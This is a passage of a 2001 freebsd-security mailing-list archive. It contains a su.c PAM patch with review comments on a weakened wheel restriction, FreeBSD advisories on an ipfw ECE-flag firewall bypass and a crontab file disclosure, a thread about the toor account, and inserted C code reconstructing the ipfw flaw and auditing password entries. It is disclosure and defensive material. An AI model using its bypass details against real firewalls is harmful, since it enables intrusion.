and non-standard target shell, must be root */ - if (!chshell(pwd->pw_shell) && ruid) + if (ruid && !chshell(pwd->pw_shell)) errx(1, "permission denied (shell)."); } else if (pwd->pw_shell && *pwd->pw_shell) { shell = pwd->pw_shell; 
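Review bot: wrapping the whole password block in #ifndef USE_PAM, with the group-walk variables g and gr now declared only for !USE_PAM (first su.c hunk), compiles the wheel-group restriction out of the PAM build: any user who knows the root password can su to root unless the "su" service in /etc/pam.conf is given a module such as pam_wheel. Either keep the group membership test outside the #ifndef, or state in the su.1 hunk (which currently only names the service) that the wheel restriction must now be configured in pam.conf.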
@@ -334,9 +400,51 @@ (void)setpriority(PRIO_PROCESS, 0, prio); -#ifdef LOGIN_CAP + /* + * PAM modules might add supplementary groups in + * pam_setcred(), so initialize them first. + */ + if (setusercontext(lc, pwd, pwd->pw_uid, LOGIN_SETGROUP) < 0) + err(1, "setusercontext"); + +#ifdef USE_PAM + retcode = pam_setcred(pamh, PAM_ESTABLISH_CRED); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, retcode)); + } + + /* + * We must fork() before setuid() because we need to call + * pam_setcred(pamh, PAM_DELETE_CRED) as root. + */ + + statusp = 1; + switch ((child_pid = fork())) { + default: + while ((ret_pid = waitpid(child_pid, &statusp, WUNTRACED)) != -1) { + if (WIFSTOPPED(statusp)) { + child_pgrp = tcgetpgrp(1); + kill(getpid(), SIGSTOP); + tcsetpgrp(1, child_pgrp); + kill(child_pid, SIGCONT); + statusp = 1; + continue; + } + break; + } + if (ret_pid == -1) + err(1, "waitpid"); + PAM_END; + exit(statusp); + case -1: + err(1, "fork"); + PAM_END; + exit (1); + case 0: +#endif /* USE_PAM */ + /* Set everything now except the environment & umask */ - setwhat = LOGIN_SETUSER|LOGIN_SETGROUP|LOGIN_SETRESOURCES|LOGIN_SETPRIORITY; + setwhat = LOGIN_SETUSER|LOGIN_SETRESOURCES|LOGIN_SETPRIORITY; /* * Don't touch resource/priority settings if -m has been * used or -l and -c hasn't, and we're not su'ing to root. @@ -345,15 +453,6 @@ setwhat &= ~(LOGIN_SETPRIORITY|LOGIN_SETRESOURCES); if (setusercontext(lc, pwd, pwd->pw_uid, setwhat) < 0) err(1, "setusercontext"); -#else - /* set permissions */ - if (setgid(pwd->pw_gid) < 0) - err(1, "setgid"); - if (initgroups(user, pwd->pw_gid)) - errx(1, "initgroups failed"); - if (setuid(pwd->pw_uid) < 0) - err(1, "setuid"); -#endif if (!asme) { if (asthem) { 
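Review bot: exit(statusp) in the parent passes the raw waitpid() status word to exit(): a child that exits 1 yields 256, which truncates to 0, so su reports success for every failed command. Use WEXITSTATUS(statusp) when WIFEXITED, and re-raise or map the signal when WIFSIGNALED. In the same hunk, `case -1: err(1, "fork"); PAM_END;` never reaches PAM_END, and a waitpid() interrupted by a signal (EINTR) breaks out of the loop into err(1, "waitpid") without PAM_END, so the PAM_DELETE_CRED step is skipped in both cases; retry on EINTR and run PAM_END before err(). pam_setcred() failing is only logged here too; see the rshd note.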
@@ -361,16 +460,9 @@ #ifdef KERBEROS k = getenv("KRBTKFILE"); #endif - if ((cleanenv = calloc(20, sizeof(char*))) == NULL) - errx(1, "calloc"); - cleanenv[0] = NULL; - environ = cleanenv; -#ifdef LOGIN_CAP + environ = &cleanenv; /* set the su'd user's environment & umask */ setusercontext(lc, pwd, pwd->pw_uid, LOGIN_SETPATH|LOGIN_SETUMASK|LOGIN_SETENV); -#else - (void)setenv("PATH", _PATH_DEFPATH, 1); -#endif if (p) (void)setenv("TERM", p, 1); #ifdef KERBEROS @@ -385,6 +477,17 @@ (void)setenv("HOME", pwd->pw_dir, 1); (void)setenv("SHELL", shell, 1); } + + login_close(lc); + +#ifdef USE_PAM + env = (const char * const *)pam_getenvlist(pamh); + if (env != NULL) { + for (i=0; env[i]; i++) + putenv(env[i]); + } +#endif /* USE_PAM */ + if (iscsh == YES) { if (fastlogin) *np-- = "-f"; @@ -396,20 +499,20 @@ *np = asthem ? "-su" : iscsh == YES ? "_su" : "su"; if (ruid != 0) - syslog(LOG_NOTICE|LOG_AUTH, "%s to %s%s", + syslog(LOG_NOTICE, "%s to %s%s", username, user, ontty()); - login_close(lc); - execv(shell, np); err(1, "%s", shell); +#ifdef USE_PAM + } +#endif /* USE_PAM */ } static void usage() { - (void)fprintf(stderr, "usage: su [%s] [login [args]]\n", ARGSTR); - exit(1); + errx(1, "usage: su [%s] [login [args]]", ARGSTR); } int @@ -493,7 +596,7 @@ return (1); } warnx("kerberos: unable to su: %s", krb_err_txt[kerno]); - syslog(LOG_NOTICE|LOG_AUTH, + syslog(LOG_NOTICE, "BAD Kerberos SU: %s to %s%s: %s", username, user, ontty(), krb_err_txt[kerno]); return (1); 
@@ -520,13 +623,13 @@ if (kerno == KDC_PR_UNKNOWN) { warnx("Warning: TGT not verified."); - syslog(LOG_NOTICE|LOG_AUTH, + syslog(LOG_NOTICE, "%s to %s%s, TGT not verified (%s); %s.%s not registered?", username, user, ontty(), krb_err_txt[kerno], "rcmd", savehost); } else if (kerno != KSUCCESS) { warnx("Unable to use TGT: %s", krb_err_txt[kerno]); - syslog(LOG_NOTICE|LOG_AUTH, "failed su: %s to %s%s: %s", + syslog(LOG_NOTICE, "failed su: %s to %s%s: %s", username, user, ontty(), krb_err_txt[kerno]); dest_tkt(); return (1); @@ -540,9 +643,9 @@ if ((kerno = krb_rd_req(&ticket, "rcmd", savehost, faddr, &authdata, "")) != KSUCCESS) { - warnx("kerberos: unable to verify rcmd ticket: %s\n", + warnx("kerberos: unable to verify rcmd ticket: %s", krb_err_txt[kerno]); - syslog(LOG_NOTICE|LOG_AUTH, + syslog(LOG_NOTICE, "failed su: %s to %s%s: %s", username, user, ontty(), krb_err_txt[kerno]); dest_tkt();

From owner-freebsd-security Tue Jan 23 10:50:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 27C3837B404 for ; Tue, 23 Jan 2001 10:50:04 -0800 (PST)
Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id 522B0193E4; Tue, 23 Jan 2001 12:50:03 -0600 (CST)
Received: (from nectar@localhost) by hamlet.nectar.com (8.11.1/8.9.3) id f0NIo3N24571; Tue, 23 Jan 2001 12:50:03 -0600 (CST) (envelope-from nectar@spawn.nectar.com)
Date: Tue, 23 Jan 2001 12:50:03 -0600
From: "Jacques A. Vidrine"
To: "David J. MacKenzie"
Cc: freebsd-security@freebsd.org
Subject: Re: Fwd: [PAM broken design? pam_setcred]
Message-ID: <20010123125002.A24538@hamlet.nectar.com>
Mail-Followup-To: "Jacques A. Vidrine" , "David J. MacKenzie" , freebsd-security@freebsd.org
References: <20010123183944.4A4C83E5B@catapult.web.us.uu.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010123183944.4A4C83E5B@catapult.web.us.uu.net>; from djm@web.us.uu.net on Tue, Jan 23, 2001 at 01:39:44PM -0500
X-Url: http://www.nectar.com/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Jan 23, 2001 at 01:39:44PM -0500, David J. MacKenzie wrote:
>
> I forwarded your example to the Linux-PAM maintainers, and got back
> a reply favoring the approach you intuitively expect; to save the
> pam_sm_authenticate() results and call the same modules' pam_sm_setcred()
> functions.
>
> The bug report is in the tracking system at:
>
> http://sourceforge.net/bugs/?func=detailbug&bug_id=129775&group_id=6663

Thanks much for following this up, David. I had been aware of the bug since November (when I first mailed the PAM maintainer about it), but I had too much above it in my TODO list to look after it :-( Hopefully this will be fixed and then we can import it. Or maybe _you_ could import it, *hint* *hint*

Cheers,
-- 
Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

From owner-freebsd-security Tue Jan 23 13:08:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: by hub.freebsd.org (Postfix, from userid 758) id 349E837B402; Tue, 23 Jan 2001 13:08:23 -0800 (PST)
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw
Reply-To: security-advisories@freebsd.org
Message-Id: <20010123210823.349E837B402@hub.freebsd.org>
Date: Tue, 23 Jan 2001 13:08:23 -0800 (PST)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:08                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          ipfw/ip6fw allows bypassing of 'established' keyword

Category:       core
Module:         kernel
Announced:      2001-01-23
Credits:        Aragon Gouveia
Affects:        FreeBSD 3.x (all releases), FreeBSD 4.x (all releases),
                FreeBSD 3.5-STABLE and 4.2-STABLE prior to the correction date.
Corrected:      2001-01-09 (FreeBSD 4.2-STABLE)
                2001-01-12 (FreeBSD 3.5-STABLE)
FreeBSD only:   Yes

I.   Background

ipfw is a system facility which allows IP packet filtering, redirecting, and traffic accounting. ip6fw is the corresponding utility for IPv6 networks, included in FreeBSD 4.0 and above. It is based on an old version of ipfw and does not contain as many features.

II.  Problem Description

Due to overloading of the TCP reserved flags field, ipfw and ip6fw incorrectly treat all TCP packets with the ECE flag set as being part of an established TCP connection, which will therefore match a corresponding ipfw rule containing the 'established' qualifier, even if the packet is not part of an established connection.

The ECE flag is not believed to be in common use on the Internet at present, but is part of an experimental extension to TCP for congestion notification. At least one other major operating system will emit TCP packets with the ECE flag set under certain operating conditions.

Only systems which have enabled ipfw or ip6fw and use a ruleset containing TCP rules which make use of the 'established' qualifier, such as "allow tcp from any to any established", are vulnerable.
The exact impact of the vulnerability on such systems is undetermined and depends on the exact ruleset in use. All released versions of FreeBSD prior to the correction date including FreeBSD 3.5.1 and FreeBSD 4.2 are vulnerable, but it was corrected prior to the (future) release of FreeBSD 4.3. III. Impact Remote attackers who construct TCP packets with the ECE flag set may bypass certain ipfw rules, allowing them to potentially circumvent the firewall. IV. Workaround Because the vulnerability only affects 'established' rules and ECE- flagged TCP packets, this vulnerability can be removed by adjusting the system's rulesets. In general, it is possible to express most 'established' rules in terms of a general TCP rule (with no TCP flag qualifications) and a 'setup' rule, but may require some restructuring and renumbering of the ruleset. V. Solution One of the following: 1) Upgrade the vulnerable FreeBSD system to FreeBSD 3.5-STABLE, or or 4.2-STABLE after the correction date. 2) Patch your present system by downloading the relevant patch from the below location: [FreeBSD 4.x] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:08/ipfw-4.x.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:08/ipfw-4.x.patch.asc [FreeBSD 3.x] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:08/ipfw-3.x.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:08/ipfw-3.x.patch.asc Verify the detached PGP signature using your PGP utility. 
Execute the following commands as root: # cd /usr/src # patch -p < /path/to/patch # cp /usr/src/sys/netinet/tcp.h /usr/src/sys/netinet/ip_fw.h /usr/include/netinet/ # cd /usr/src/sbin/ipfw # make depend && make all install # cd /usr/src/sys/modules/ipfw # make depend && make all install For 4.x systems, perform the following additional steps: # cp /usr/src/sys/netinet6/ip6_fw.h /usr/include/netinet6/ # cd /usr/src/sbin/ip6fw # make depend && make all install # cd /usr/src/sys/modules/ip6fw # make depend && make all install NOTE: The ip6fw patches have not yet been tested but are believed to be correct. The ip6fw software is not currently maintained and may be removed in a future release. If the system is using the ipfw or ip6fw kernel modules (see kldstat(8)), the module may be unloaded and the corrected module loaded into the kernel using kldload(8)/kldunload(8). This will require that the firewall rules be reloaded, usually be executing the /etc/rc.firewall script. Because the loading of the ipfw or ip6fw module will result in the system denying all packets by default, this should only be attempted when accessing the system via console or by careful use of a command such as: # kldload ipfw && sh /etc/rc.firewall which performs both operations sequentially. Otherwise, if the system has ipfw or ip6fw compiled into the kernel, the kernel will also have to be recompiled and installed, and the system will have to be rebooted for the changes to take effect. 
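To make the "overloading of the TCP reserved flags field" in section II concrete, here is an added illustration; it is my own reconstruction of the bug class, not FreeBSD's ip_fw.c and not the advisory's patch. It also shows why the Workaround section's 'setup' plus general-TCP form does not depend on the overloaded bit. The rule layout, the two matchers (tcp_match_flawed, tcp_match_fixed), the verdict function and every packet are constructed for the demonstration; in particular, the exact way the flawed version combines the rule word with the flags byte is an assumption.

```c
/* Added illustration, not FreeBSD's ip_fw.c: a reconstruction of the bug
 * class named in SA-01:08 (a rule-private 'established' bit kept in the same
 * byte as the TCP wire flags) and of why the advisory's ruleset workaround
 * does not depend on that bit. Rule layout, matchers and packets are all
 * constructed for the demonstration. */
#include <stdint.h>
#include <stdio.h>

/* TCP wire flag bits: RFC 793 plus the two ECN bits (ECE, CWR) of the
 * congestion-notification extension that was still experimental in 2001. */
#define TH_FIN   0x01
#define TH_SYN   0x02
#define TH_RST   0x04
#define TH_PUSH  0x08
#define TH_ACK   0x10
#define TH_URG   0x20
#define TH_ECE   0x40
#define TH_CWR   0x80
#define TH_FLAGS (TH_FIN|TH_SYN|TH_RST|TH_PUSH|TH_ACK|TH_URG|TH_ECE|TH_CWR)

/* Flawed layout (hypothetical): the rule's ESTAB qualifier occupies bit 0x40
 * of the same byte as the wire flags. Before ECN no packet set that bit, so
 * the overlap was harmless until ECE-flagged segments appeared. */
#define RULE_ESTAB_OVERLOADED 0x40

/* Fixed layout: qualifier bits live above the eight wire-flag bits. */
#define RULE_ESTAB 0x100

struct rule {
    unsigned tcpf;   /* bits that must be set; may carry a qualifier */
    uint8_t  tcpnf;  /* wire bits that must be clear */
    int      allow;  /* verdict if the rule matches: 1 allow, 0 deny */
};

/* 'established' for filtering purposes: ACK or RST present, so the segment
 * cannot be the opening SYN of a new connection. */
static int established(uint8_t th_flags)
{
    return (th_flags & (TH_ACK | TH_RST)) != 0;
}

/* Flawed matcher: when the dedicated 'established' test fails, the generic
 * "every requested bit is present" comparison runs against the unmasked rule
 * word, so a segment carrying ECE (0x40) satisfies the ESTAB bit (0x40). */
int tcp_match_flawed(uint8_t th_flags, const struct rule *r)
{
    if ((r->tcpf & RULE_ESTAB_OVERLOADED) && established(th_flags))
        return !(th_flags & r->tcpnf);
    return (th_flags & (uint8_t)r->tcpf) == (uint8_t)r->tcpf
        && !(th_flags & r->tcpnf);
}

/* Fixed matcher: the qualifier is decided on its own, and only wire-defined
 * bits (TH_FLAGS) are ever compared against the packet. */
int tcp_match_fixed(uint8_t th_flags, const struct rule *r)
{
    uint8_t want = (uint8_t)(r->tcpf & TH_FLAGS);
    if (r->tcpf & RULE_ESTAB)
        return established(th_flags) && !(th_flags & r->tcpnf);
    return (th_flags & want) == want && !(th_flags & r->tcpnf);
}

/* First-match evaluation; falls through to an implicit deny (0). */
int verdict(uint8_t th_flags, const struct rule *rs, int n,
            int (*match)(uint8_t, const struct rule *))
{
    for (int i = 0; i < n; i++)
        if (match(th_flags, &rs[i]))
            return rs[i].allow;
    return 0;
}

/* Ruleset A, the vulnerable shape: "allow tcp from any to any established",
 * everything else denied by default. */
const struct rule ruleset_a_flawed[] = { { RULE_ESTAB_OVERLOADED, 0, 1 } };
const struct rule ruleset_a_fixed[]  = { { RULE_ESTAB, 0, 1 } };

/* Ruleset B, the advisory's workaround shape: deny 'setup' segments (SYN set,
 * ACK clear), then allow the rest of TCP with no flag test at all. */
const struct rule ruleset_b[] = { { TH_SYN, TH_ACK, 0 }, { 0, 0, 1 } };

/* 1 if setting ECE on top of base_flags flips the verdict, else 0. */
int ece_changes_verdict(uint8_t base_flags, const struct rule *rs, int n,
                        int (*match)(uint8_t, const struct rule *))
{
    return verdict(base_flags, rs, n, match)
        != verdict(base_flags | TH_ECE, rs, n, match);
}

int main(void)
{
    /* Does adding ECE to an opening SYN change the verdict? Only for
     * ruleset A under the flawed matcher. */
    printf("A/flawed:%d A/fixed:%d B/flawed:%d\n",
           ece_changes_verdict(TH_SYN, ruleset_a_flawed, 1, tcp_match_flawed),
           ece_changes_verdict(TH_SYN, ruleset_a_fixed, 1, tcp_match_fixed),
           ece_changes_verdict(TH_SYN, ruleset_b, 2, tcp_match_flawed));
    return 0;
}
```

One caveat to weigh when restructuring a ruleset as section IV suggests: ruleset B allows a segment that carries none of SYN, ACK or RST (ECE alone, for instance), which the strict 'established' rule under the fixed matcher denies, so the two forms agree for ordinary traffic but not for every possible flag combination.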
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOm3yulUuHi5z0oilAQEJbQP+Nf6JEKNUz0bOhgOYmY0DDCQNbY/2dlxA
Qhs59HSB9Y7cwP+NuFKhix2fii8Y5oSOxjfMhllRl0yIQMHloG6orXNBuYJQ++d5
A/e+eoePNTzTo7kbaEZyvS3pGBodkueUmnKAqT9Ho/SGY00p4/JxpNcp3KuYT4Re
gyKXSFV3rkQ=
=7XOn
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Jan 23 13:22: 1 2001
Delivered-To: freebsd-security@freebsd.org
Received: by hub.freebsd.org (Postfix, from userid 758) id 18D8D37B69B; Tue, 23 Jan 2001 13:21:26 -0800 (PST)
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory: FreeBSD-SA-01:09.crontab
Reply-To: security-advisories@freebsd.org
Message-Id: <20010123212126.18D8D37B69B@hub.freebsd.org>
Date: Tue, 23 Jan 2001 13:21:26 -0800 (PST)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:09                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          crontab allows users to read certain files

Category:       core
Module:         crontab
Announced:      2001-01-23
Credits:        Kyong-won Cho
Affects:        FreeBSD 3.x (all releases), 4.x (all releases prior to 4.2)
                FreeBSD 3.5.1-STABLE and 4.1.1-STABLE prior to the
                correction date.
Corrected:      2000-11-11 (FreeBSD 4.1.1-STABLE)
                2000-11-20 (FreeBSD 3.5.1-STABLE)
FreeBSD only:   No

I.   Background

crontab(8) is a program to edit crontab(5) files for use by the cron daemon, which schedules jobs to run at specified times.

II.  Problem Description

crontab(8) was discovered to contain a vulnerability that may allow local users to read any file on the system that conforms to a valid crontab(5) file syntax. Due to crontab(5) syntax requirements, the files that may be read are limited and subject to the following restrictions:

* The file is a valid crontab(5) file, or:

* The file is entirely commented out; every line contains either only whitespace, or begins with a '#' character.

The greatest security vulnerability is the disclosure of crontab entries owned by other users, which may contain sensitive data such as keying material (although this would often be publicly disclosed anyway at the time when the crontab job executes, via process arguments and environment, etc).

All released versions of FreeBSD prior to the correction date including FreeBSD 4.1.1 are vulnerable to this problem. The problem was corrected prior to the release of FreeBSD 4.2.

III. Impact

Malicious local users can read arbitrary local files that conform to a valid crontab file syntax.

IV.  Workaround

One of the following:

1) Utilize crontab allow/deny files (/var/cron/allow and /var/cron/deny) to limit access to use the crontab(8) utility.

2) Remove the setuid privileges from /usr/sbin/crontab. However, this will not allow users other than root to use cron.

V.   Solution

One of the following:

Upgrade the vulnerable FreeBSD system to 3.5-STABLE or 4.1.1-STABLE after the correction date.

To patch your present system: download the relevant patch from the below location and execute the following commands as root:

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:09/crontab-4.x.patch
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:09/crontab-4.x.patch.asc

Verify the detached PGP signature using your PGP utility.

# cd /usr/src/usr.sbin/cron/crontab
# patch -p < /path/to/patch
# make depend && make all install

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOm32m1UuHi5z0oilAQGA+QQAhArbkzv/lo8QibLjyEFB3lta0IC5HSrJ
hPuetiP/XViZNXntIAtm26M9QGRAhw0M1s9CU6PGD0zVJHtfh/nRoNxdU9vFLhJ6
xbJf6Wai6VTJpQK7dwXKIi6nplKlOSLhd6ZhvP1fe/6bDsbYywOxJdYGJZcyKtFA
vG1n8lhzhog=
=EJ7/
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Jan 23 13:24:56 2001
Delivered-To: freebsd-security@freebsd.org
Received: from relay1.pair.com (relay1.pair.com [209.68.1.20]) by hub.freebsd.org (Postfix) with SMTP id 58E8E37B404 for ; Tue, 23 Jan 2001 13:24:27 -0800 (PST)
Received: (qmail 18805 invoked from network); 23 Jan 2001 21:24:24 -0000
Received: from sanpedro-a121.racsa.co.cr (HELO aristoteles.local.galileo.or.cr) (196.40.40.122) by relay1.pair.com with SMTP; 23 Jan 2001 21:24:24 -0000
X-pair-Authenticated: 196.40.40.122
From: Guillermo Leandro
Organization: Fundación Galileo
To: freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG
Subject: Default users and the passwords
Date: Tue, 23 Jan 2001 15:24:40 -0600
X-Mailer: KMail [version 1.1.99]
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Message-Id: <01012315244000.00612@aristoteles.local.galileo.or.cr>
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi everybody!

FreeBSD, like almost all Unix OSes, has other default users, like uucp, operator, etc. Since these users come with the FreeBSD distribution, where can I find their passwords?

Another thing, why is there another uid 0 called toor? Isn't it a potential security hole?

Thanks very much.

--
Guillermo Leandro, FUNDACIÓN GALILEO
E-mail: guille@galileo.or.cr
Site: http://www.galileo.or.cr
Tel. (506) 280 8683, telefax. (506) 280 8847

From owner-freebsd-security Tue Jan 23 13:31:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by hub.freebsd.org (Postfix) with ESMTP id C29C337B698; Tue, 23 Jan 2001 13:31:11 -0800 (PST)
Received: (from danderse@localhost) by faith.cs.utah.edu (8.9.3/8.9.3) id OAA10865; Tue, 23 Jan 2001 14:31:07 -0700 (MST)
Message-Id: <200101232131.OAA10865@faith.cs.utah.edu>
Subject: Re: Default users and the passwords
To: guille@galileo.or.cr (Guillermo Leandro)
Date: Tue, 23 Jan 2001 14:31:07 -0700 (MST)
Cc: freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG
In-Reply-To: <01012315244000.00612@aristoteles.local.galileo.or.cr> from "Guillermo Leandro" at Jan 23, 2001 03:24:40 PM
From: "David G. Andersen"
X-Mailer: ELM [version 2.5 PL2]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Lo and behold, Guillermo Leandro once said:
>
> Hi everybody!
>
> FreeBSD, like almost all Unix OSes, has other default users, like uucp,
> operator, etc. Since these users come with the FreeBSD distribution, where
> can I find their passwords?

They don't have passwords. /etc/master.passwd

> Another thing, why is there another uid 0 called toor? Isn't it a potential
> security hole?

It doesn't have a password. It just has a different shell. No, it's not a potential security hole. If you don't like it, delete it with vipw.

-Dave

--
work: dga@lcs.mit.edu                          me:  dga@pobox.com
      MIT Laboratory for Computer Science           http://www.angio.net/

From owner-freebsd-security Tue Jan 23 13:35: 9 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hex.databits.net (hex.databits.net [207.29.192.16]) by hub.freebsd.org (Postfix) with SMTP id 37C3037B69E for ; Tue, 23 Jan 2001 13:34:49 -0800 (PST)
Received: (qmail 89604 invoked by uid 1001); 23 Jan 2001 21:36:05 -0000
Date: Tue, 23 Jan 2001 16:36:05 -0500
From: Pete Fritchman
To: Guillermo Leandro
Cc: freebsd-security@FreeBSD.org
Subject: Re: Default users and the passwords
Message-ID: <20010123163605.A89275@databits.net>
References: <01012315244000.00612@aristoteles.local.galileo.or.cr>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
User-Agent: Mutt/1.2.5i
In-Reply-To: <01012315244000.00612@aristoteles.local.galileo.or.cr>; from guille@galileo.or.cr on Tue, Jan 23, 2001 at 03:24:40PM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

[ removed -hackers ]

++ 23/01/01 15:24 -0600 - Guillermo Leandro:
>Hi everybody!
>
>FreeBSD, like almost all Unix OSes, has other default users, like uucp,
>operator, etc. Since these users come with the FreeBSD distribution, where
>can I find their passwords?

As root, 'less /etc/master.passwd' (note - you should not edit this file directly, see the vipw(8) utility). Their password is '*' by default, which translates to being locked (ie: no crypt()'d password will EVER be a '*').

>
>Another thing, why is there another uid 0 called toor? Isn't it a potential
>security hole?

No. Like the other default users, the 'toor' account is locked by default. IIRC, the purpose of toor is to have a different shell for root (ie: zsh, bash, etc). It's probably a bad idea to change root's shell unless you know what you are doing (you don't want to lock yourself out by accidentally specifying a wrong shell). I guess it's really not important anymore since you can specify a shell for single user mode, but it used to be a good idea to have root's shell statically compiled (in case you need to be root in single user, and /usr is on another partition that's not mounted, etc).

So - if you prefer another shell, 'chsh -s /path/to/new/shell toor' and 'passwd toor'. It should probably be a different password than root, just for security's sake.

Good luck.

-pete

>
>Thanks very much.
>--
>Guillermo Leandro, FUNDACIÓN GALILEO
>E-mail: guille@galileo.or.cr
>Site: http://www.galileo.or.cr
>Tel. (506) 280 8683, telefax. (506) 280 8847
>[...]

--
Pete Fritchman
Databits Network Services, Inc.

From owner-freebsd-security Tue Jan 23 13:48:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 73F4637B69C for ; Tue, 23 Jan 2001 13:48:31 -0800 (PST)
Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id 6B913193E4 for ; Tue, 23 Jan 2001 15:48:29 -0600 (CST)
Received: (from nectar@localhost) by hamlet.nectar.com (8.11.1/8.9.3) id f0NLmTe74752 for freebsd-security@freebsd.org; Tue, 23 Jan 2001 15:48:29 -0600 (CST) (envelope-from nectar@spawn.nectar.com)
Date: Tue, 23 Jan 2001 15:48:29 -0600
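As an added illustration of the two points in Pete Fritchman's answer in the "Default users and the passwords" thread above (a '*' password field can never match a crypt() output, so the account is locked; a second uid-0 entry such as toor is only a concern when it is not locked), here is a small audit program that is not part of the thread. It parses master.passwd-style lines from a constructed sample (the root hash is a placeholder, the guest entry is invented) and reports uid-0 accounts, empty password fields, and any non-root uid-0 login that has its own password. The function and type names are my own.

```c
/* Added example, not code from the thread: an audit of master.passwd-style
 * entries applying the two points above: a password field of "*" can never
 * equal a crypt() result (locked), and a second uid-0 entry such as toor only
 * matters when it is not locked. All entries below are a constructed sample
 * and the root hash is a placeholder, not a real hash. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum pw_state { PW_LOCKED, PW_EMPTY, PW_HASHED };

struct pw_entry { char name[32]; char shell[64]; long uid; enum pw_state state; };
struct audit_result { int uid0_accounts; int findings; };

/* Classify the password field the way login(1) would experience it. */
enum pw_state classify_password(const char *field)
{
    if (field[0] == '\0')
        return PW_EMPTY;              /* no password at all */
    if (strcmp(field, "*") == 0)
        return PW_LOCKED;             /* crypt() never produces "*" */
    return PW_HASHED;
}

/* Parse one master.passwd(5) line:
 *   name:password:uid:gid:class:change:expire:gecos:home:shell
 * Returns 0 on success, -1 if the field count is wrong. */
int parse_master_passwd_line(const char *line, struct pw_entry *e)
{
    char buf[256], *fields[10], *p;
    int n;

    if (strlen(line) >= sizeof buf)
        return -1;
    strcpy(buf, line);
    fields[0] = buf;
    for (n = 1; n < 10; n++) {
        if ((p = strchr(fields[n - 1], ':')) == NULL)
            return -1;                /* too few fields */
        *p = '\0';
        fields[n] = p + 1;
    }
    if (strchr(fields[9], ':') != NULL)
        return -1;                    /* too many fields */
    snprintf(e->name, sizeof e->name, "%s", fields[0]);
    snprintf(e->shell, sizeof e->shell, "%s", fields[9]);
    e->uid = strtol(fields[2], NULL, 10);
    e->state = classify_password(fields[1]);
    return 0;
}

/* Report every uid-0 account with its shell and lock state; count as findings
 * any malformed line, any empty password field, and any uid-0 account other
 * than root that carries a usable (hashed) password. */
struct audit_result audit_entries(const char *const *lines, int count)
{
    struct audit_result r = { 0, 0 };
    for (int i = 0; i < count; i++) {
        struct pw_entry e;
        if (parse_master_passwd_line(lines[i], &e) != 0) {
            printf("FINDING: malformed entry: %s\n", lines[i]);
            r.findings++;
            continue;
        }
        if (e.state == PW_EMPTY) {
            printf("FINDING: %s has an empty password field\n", e.name);
            r.findings++;
        }
        if (e.uid == 0) {
            r.uid0_accounts++;
            printf("uid 0: %-8s shell=%-20s %s\n", e.name, e.shell,
                   e.state == PW_LOCKED ? "locked" : "password set");
            if (strcmp(e.name, "root") != 0 && e.state == PW_HASHED) {
                printf("REVIEW: %s is a second uid-0 login with its own password\n", e.name);
                r.findings++;
            }
        }
    }
    return r;
}

/* Constructed sample: root with a placeholder hash, toor locked but on a
 * different shell, locked system accounts, and one passwordless guest. */
const char *const sample_master_passwd[] = {
    "root:$1$PLACEHOLDER$notarealhash:0:0::0:0:Charlie &:/root:/bin/csh",
    "toor:*:0:0::0:0:Bourne-again Superuser:/root:/usr/local/bin/bash",
    "daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin",
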